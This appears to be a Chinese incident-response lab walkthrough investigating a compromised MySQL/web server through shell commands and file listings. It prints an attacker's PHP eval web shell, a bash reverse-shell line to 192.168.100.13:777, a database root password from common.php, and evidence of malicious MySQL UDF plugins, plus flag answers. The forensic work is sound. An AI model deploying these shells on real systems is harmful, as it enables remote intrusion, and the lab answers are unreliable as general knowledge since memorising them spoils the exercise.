第二章日志分析-mysql应急响应

root@xuanji:/var/www/html# ls -lt

total 508

-rw-r--r--. 1 www-data www-data 483403 Aug  1  2023 adminer.php

-rw-rw-rw-. 1 mysql    mysql        73 Aug  1  2023 sh.php

-rw-rw-rw-. 1 mysql    mysql         0 Aug  1  2023 tmpubzil.php

-rw-rw-rw-. 1 mysql    mysql         0 Aug  1  2023 tmputsrv.php

-rw-rw-rw-. 1 mysql    mysql         0 Aug  1  2023 tmpuvdzm.php

-rwxrwxrwx. 1 root     root          0 Jul 31  2023 log.php

-rwxrwxrwx. 1 www-data www-data   8371 Jul 20  2023 Writenote.php

-rwxrwxrwx. 1 www-data www-data    124 Jul 20  2023 common.php

drwxrwxrwx. 1 www-data www-data     79 Jul 20  2023 css

drwxrwxrwx. 1 www-data www-data     39 Jul 20  2023 images

-rwxrwxrwx. 1 www-data www-data   2624 Jul 20  2023 index.php

drwxrwxrwx. 1 www-data www-data    104 Jul 20  2023 js

-rwxrwxrwx. 1 www-data www-data   8055 Jul 20  2023 search.php

root@xuanji:/var/www/html# cat sh.php 

1       2       <?php @eval($_POST['a']);?>     4

//ccfda79e-7aa1-4275-bc26-a6189eb9a20b

root@xuanji:/tmp# cat 1.sh 

bash -i >&/dev/tcp/192.168.100.13/777 0>&1

root@xuanji:/var/www/html# cat common.php 

<?php

$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");

if(!$conn){

echo "数据库连接失败";

}

root@xuanji:/var/www/html# mysql -h 127.0.0.1 -p

Enter password: 

Welcome to the MariaDB monitor.  Commands end with ; or \g.

Your MariaDB connection id is 1

Server version: 5.5.64-MariaDB-1ubuntu0.14.04.1 (Ubuntu)

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show variables like '%plugin%';

+-----------------+------------------------+

| Variable_name   | Value                  |

+-----------------+------------------------+

| plugin_dir      | /usr/lib/mysql/plugin/ |

| plugin_maturity | unknown                |

+-----------------+------------------------+

2 rows in set (0.00 sec)

MariaDB [(none)]> exit

Bye

root@xuanji:/var/www/html# cd /usr/lib/mysql/plugin/

root@xuanji:/usr/lib/mysql/plugin# ls -al

total 4752

drwxr-xr-x. 1 mysql mysql      39 Aug  1  2023 .

drwxr-xr-x. 1 root  root       20 Jul 31  2023 ..

-rw-r--r--. 1 mysql mysql   10416 May 16  2019 auth_pam.so

-rw-r--r--. 1 mysql mysql    6464 May 16  2019 auth_socket.so

-rw-r--r--. 1 mysql mysql   10200 May 16  2019 dialog.so

-rw-r--r--. 1 mysql mysql 1600136 May 16  2019 ha_innodb.so

-rw-r--r--. 1 mysql mysql  159304 May 16  2019 handlersocket.so

-rw-r--r--. 1 mysql mysql    6104 May 16  2019 mysql_clear_password.so

-rw-rw-rw-. 1 mysql mysql   10754 Aug  1  2023 mysqludf.so

-rw-r--r--. 1 mysql mysql   39944 May 16  2019 semisync_master.so

-rw-r--r--. 1 mysql mysql   14736 May 16  2019 semisync_slave.so

-rw-r--r--. 1 mysql mysql   55696 May 16  2019 server_audit.so

-rw-r--r--. 1 mysql mysql 2918008 May 16  2019 sphinx.so

-rw-r--r--. 1 mysql mysql   11008 May 16  2019 sql_errlog.so

-rw-rw-rw-. 1 mysql mysql      34 Aug  1  2023 udf.so

root@xuanji:/usr/lib/mysql/plugin# echo -n "$(pwd)/$(basename udf.so)" | md5sum

b1818bde4e310f3d23f1005185b973e7  -

root@xuanji:/usr/lib/mysql/plugin# ps -ef | grep mysqld

root           9       1  0 10:35 ?        00:00:00 /bin/bash /usr/bin/mysqld_safe

mysql        364       9  0 10:35 ?        00:00:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306

root         553     414  0 10:52 pts/0    00:00:00 grep --color=auto mysqld